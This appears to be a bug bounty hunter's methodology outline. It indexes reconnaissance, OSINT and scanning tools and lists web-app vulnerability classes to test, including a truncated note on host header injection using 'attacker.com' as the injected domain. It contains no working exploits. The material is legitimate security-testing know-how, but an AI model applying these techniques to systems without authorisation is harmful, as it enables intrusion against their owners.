Bug Bounty Path
This is a start on documenting my process. The goal is automation....maybe.
Mitre ATT&CK: Recon
Reconnaissance consists of techniques that involve adversaries actively or passively gathering in...
Active Scanning
Consists of
Active Scanning Scanning IP Blocks Vulnerability Scanning Wordlist Scanning Gather ...
Gathering Host Information
Gather Identity Information
Gather Network Information
Gather Org Information
Open Technical Infomation
References
https://attack.mitre.org/ https://attack.mitre.org/tactics/TA0043/
Technical OSINT Tools
Open-source intelligence (OSINT) is the collection and analysis of data gathered from open source...
What is OSINT?
OSINT stands for open source intelligence. The “open source” part refers to publicly available...
Tools
OSINT Shodan Maltego Google Dorks Recon-ng Ahmia.fi Wayback Machine theHarvester TinEye...
Shodan
Shodan is a search engine of publically accessible(/discoverable) network devices on the internet...
Huntr
https://huntr.dev/ We fund open source security. We pay security researchers for finding vulner...
HackerOne
https://hackerone.com/bug-bounty-programs Bug Bounty Programs Bug bounty programs offer monetar...
Maltego
https://www.maltego.com/ Maltego is an open source intelligence and graphical link analysis tool...
Recon-ng Framework
https://github.com/lanmaster53/recon-ng Recon-ng is a full-featured reconnaissance framework des...
Ahmia.fi
Tor search engine out of scope for this round
Wayback Machine
theHarvester
https://github.com/laramies/theHarvester theHarvester is a simple to use, yet powerful tool desi...
TinEye
https://tineye.com/ for researching images online. If you have an image on your local device, yo...
OSINT Framework
https://osintframework.com/ OSINT framework focused on gathering information from free tools or ...
Find Subdomains
DNS, HackerOne, Fuzzing, and the like....
FFUF Tool
https://github.com/ffuf/ffuf ffuf - Fuzz Faster U Fool A fast web fuzzer written in Go. I...
Lepus Tool
Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port sca...
tomnomnom tools in Rengine
https://github.com/tomnomnom/gf The examples are GREAT!!!!!! gf A wrapper around grep to avo...
theFuzz (formerly known as fuzzywuzzy)
https://github.com/seatgeek/thefuzz TheFuzz Fuzzy string matching like a boss. It uses Levensht...
Name Service Takeover
Look for takeover
Wayback for URLS
End Point Discovery
Port Scanning
nmap, MassScan
NMAP
Nmap is short for “Network Mapper” and was originally released in September 1997 by Gordon Lyon...
MASSCAN: Mass IP port scanner
Git hub project https://github.com/robertdavidgraham/masscan Overview This is an Internet-scal...
Naabu (in Rengine)
Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in...
GitHub Recon
What is it and how do you do it?
WebApps Opportunities
Focus on Web Applications Vulnerabilities
Cross-origin resource sharing (CORS)
Cross-origin resource sharing (CORS) Cross-origin resource sharing (CORS) is a browser mechan...
Password Reset Vulnerability
Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into...
SNMP and HOST Header Injection
How to Test Initial testing is as simple as supplying another domain (i.e. attacker.com) i...
Clickjacking via IFRAME
Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible o...
Access Controls and Parameter Tampering
Burp Proxy Histroy for endpoint discovery
Arjun for hidden end point discovery
CSRF Discovery/Detection
SSRF Parameter Detection/Discovery
XSS and SSTI Discovery/Detection
Rate Limits
Directory Brute-Force
HTTP Request Smuggling
Open Redirect via WaybackURLs
Social-SignOn Bypass
Possible DOS vial multiple Cookies injection
File Upload via CSRF, XSS, SSRF, RCE, LFI, XXE
HTB https://whitehatlab.eu/en/blog/writeup/hackthebox/machine/linux/doctor/
Buffer Overflow
WebApp Tools
AMASS (in Rengine?)
https://github.com/owasp-amass/amass The OWASP Amass Project performs network mapping of attack ...
Nuclei (in Regine)
https://github.com/projectdiscovery/nuclei Nuclei is used to send requests across targets based ...
GoSpider
https://github.com/jaeles-project/gospider GoSpider GoSpider - Fast web spider written in Go
gau (get all urls)
https://github.com/lc/gau which replaces Rengine's https://github.com/bp0lr/gauplus getallu...
Nikto
https://github.com/sullo/nikto Nikto is an Open Source (GPL) web server scanner which performs c...